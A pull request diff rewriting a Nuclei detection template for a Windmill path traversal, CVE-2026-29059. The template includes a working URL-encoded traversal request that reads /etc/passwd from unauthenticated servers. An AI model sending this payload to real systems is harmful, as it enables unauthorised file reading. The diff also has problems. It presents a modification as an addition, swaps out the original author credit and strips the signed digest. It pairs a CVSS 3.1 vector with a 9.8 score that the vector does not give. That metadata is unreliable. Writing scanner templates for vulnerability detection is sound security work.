### PR TITLE
Add CVE-2026-29059 template

### DIFF
--- a/http/cves/2026/CVE-2026-29059.yaml
+++ b/http/cves/2026/CVE-2026-29059.yaml
@@ -1,61 +1,44 @@
 id: CVE-2026-29059
 
 info:
-  name: Windmill/Nextcloud Flow < 1.603.3 - Unauthenticated Path Traversal
-  author: 0x_Akoko
+  name: Windmill < 1.603.3 - Unauthenticated Path Traversal Arbitrary File Read
+  author: str4k3r
   severity: critical
   description: |
-    Windmill < 1.603.3 contains a path traversal caused by unsanitized filename parameter in get_log_file endpoint, letting unauthenticated attackers read arbitrary files on the server, exploit requires no authentication.
-  impact: |
-    Unauthenticated attackers can read arbitrary files on the server, potentially exposing sensitive information.
-  remediation: |
-    Update to version 1.603.3 or later.
+    Windmill before 1.603.3 exposes an unauthenticated log-file retrieval route
+    (/api/w/{workspace}/jobs_u/get_log_file/{path}) that concatenates the
+    user-supplied path segment into a filesystem path without sanitisation.
+    A remote, unauthenticated attacker can traverse out of the intended
+    directory and read arbitrary files (e.g. /etc/passwd) from the server.
   reference:
-    - https://github.com/Chocapikk/Windfall
     - https://chocapikk.com/posts/2026/windfall-nextcloud-flow-windmill-rce/
     - https://nvd.nist.gov/vuln/detail/CVE-2026-29059
   classification:
-    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
-    cvss-score: 10.0
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 9.8
     cve-id: CVE-2026-29059
-    epss-score: 0.02608
-    epss-percentile: 0.83871
     cwe-id: CWE-22
   metadata:
-    max-request: 4
-    vendor: windmill
-    product: windmill
     verified: true
-    shodan-query: http.html:"Windmill" http.html:"svelte-global-loader"
-    fofa-query: app="Windmill"
-  tags: cve,cve2026,windmill,nextcloud,lfi,unauth,vkev
+    max-request: 1
+    shodan-query: http.title:"Windmill"
+    product: windmill
+    vendor: windmill-labs
+  tags: cve,cve2026,windmill,lfi,path-traversal,unauth,file-read
 
 http:
-  - method: GET
-    path:
-      - "{{BaseURL}}/api/w/_/jobs_u/get_log_file/..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
-      - "{{BaseURL}}/api/w/_/jobs_u/get_log_file/..%2F..%2F..%2F..%2Fetc%2Fpasswd"
-      - "{{BaseURL}}/index.php/apps/app_api/proxy/flow/api/w/_/jobs_u/get_log_file/..%25252F..%25252F..%25252F..%25252F..%25252F..%25252Fetc%25252Fpasswd"
-      - "{{BaseURL}}/index.php/apps/app_api/proxy/flow/api/w/_/jobs_u/get_log_file/..%25252F..%25252F..%25252F..%25252Fetc%25252Fpasswd"
-
-    stop-at-first-match: true
+  - raw:
+      - |
+        GET /api/w/any_workspace/jobs_u/get_log_file/..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
+        Host: {{Hostname}}
 
     matchers-condition: and
     matchers:
-      - type: word
+      - type: regex
         part: body
-        words:
-          - "root:x:0:0:"
-
-      - type: word
-        part: body
-        words:
-          - "<!DOCTYPE"
-          - "Err:"
-        condition: or
-        negative: true
+        regex:
+          - "root:.*:0:0:"
 
       - type: status
         status:
           - 200
-# digest: 4b0a004830460221008ce71d88fad578876e7f0b19202ee6c96be17e1036cbf1fdbb04eddcc5b96a43022100f27029cd4ddaa8a05e55c67b9f0deea5f4a4a53c141b388ea63cdd2e6f74d807:922c64590222798bb761d5b6d8e72950


### PR DESCRIPTION
Adds the Nuclei template for **CVE-2026-29059** as an ecosystem contribution. The template follows the repository format and references the public advisory.